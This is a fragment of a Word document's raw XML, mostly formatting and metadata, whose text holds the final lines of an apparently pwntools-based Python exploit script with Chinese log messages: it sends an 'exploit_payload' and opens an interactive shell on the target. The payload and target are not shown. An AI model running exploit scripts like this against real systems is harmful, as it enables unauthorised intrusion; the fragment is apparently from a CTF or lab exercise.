      <w:r>
        <w:t xml:space="preserve">)               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9028E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A3CA1E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="708DB424" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744C1B7" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    log.info("已发送攻击载荷")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C84E09" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="6666B730" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="0D8E9976" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2025C" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        log.info("尝试获取交互式shell...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4149A2" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>io.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(prompt="已获取shell&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB286E5" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480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3EEDDE20" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        log.info("用户中断，退出...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F50C9" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AFCB9" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E068C" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="5A8DEB52" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696363ED" w14:textId="1189870D" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480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3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4D89" w14:textId="77777777" w:rsidR="00394EEA" w:rsidRDefault="00394EEA" w:rsidP="00C63D78">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75722AB2" w14:textId="77777777" w:rsidR="00394EEA" w:rsidRDefault="00394EEA" w:rsidP="00C6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A988" w14:textId="77777777" w:rsidR="00394EEA" w:rsidRDefault="00394EEA" w:rsidP="00C63D78">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E9BE737" w14:textId="77777777" w:rsidR="00394EEA" w:rsidRDefault="00394EEA" w:rsidP="00C63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B94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E7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10479"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C1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CE"/>
    <w:rsid w:val="000036FB"/>
    <w:rsid w:val="000C5A9A"/>
    <w:rsid w:val="00131480"/>
    <w:rsid w:val="00394EEA"/>
    <w:rsid w:val="009809D2"/>
    <w:rsid w:val="009B21DE"/>
    <w:rsid w:val="009C15CE"/>
    <w:rsid w:val="00A34516"/>
    <w:rsid w:val="00A41A64"/>
    <w:rsid w:val="00BE7609"/>
    <w:rsid w:val="00C63D78"/>
    <w:rsid w:val="00C8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20458"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0AEB90EA-44F2-4D73-B7EC-1F63A6D5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5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D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5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3148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314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293</Words>
  <Characters>1574</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>68</Lines>
  <Paragraphs>66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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-12T11:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-13T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>